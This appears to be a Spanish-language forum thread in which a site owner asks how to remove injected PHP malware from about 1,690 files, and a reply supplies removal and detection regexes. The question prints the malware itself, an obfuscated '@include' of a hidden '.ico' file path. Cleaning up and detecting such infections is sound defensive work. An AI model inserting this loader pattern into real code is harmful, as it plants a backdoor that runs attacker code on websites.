Intento encontrar una manera de buscar y reemplazar usando EMEditor y una expresión regular. Intento aplicar esto para el siguiente elemento:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
Intento reemplazar/borrar el código entre
<?php
y
// ini_set(?display_errors?, 1);
todo lo que hay en el medio es este fragmento de malware que intento extraer de muchos archivos.
Busco una manera fácil de eliminar esto en archivos 1690. Cualquier idea sería de gran ayuda.
Mis mejores deseos, Tomás.
Respuesta1
La expresión regular de PHP para cualquier cadena similar sería...
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
Esto se puede simplificar aún más, pero funciona como está.
**Tenga en cuenta que esto encontrará todas las apariciones de cadenas infractoras que comiencen con un bloque de comentarios que contenga 5 caracteres aleatorios que no sean líneas nuevas, seguidas de dos líneas nuevas, la línea @include, 2 líneas nuevas más y el cierre del comentario del bloque coincidente, independientemente. de si el documento se guardó en máquinas con Windows, Mac o Linux: tenga en cuenta \r\n (máquinas con Windows) y \n\n (máquinas con Linux y Mac)
He verificado que sus cadenas coincidan en la expresión regular en: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
Aviso rápido, para encontrar los archivos de malware que contienen nombres de cadenas aleatorias que contienen las funciones ofuscadas... utilice la siguiente expresión regular...
/function...\(\$..\){\$...\=."/
Esto debería rastrear los archivos alterados y encontrar cualquier archivo de malware adicional del mismo para el malware que le afecta.
¡Qué tengas un lindo día! Esperemos que esto todavía sea útil para alguien.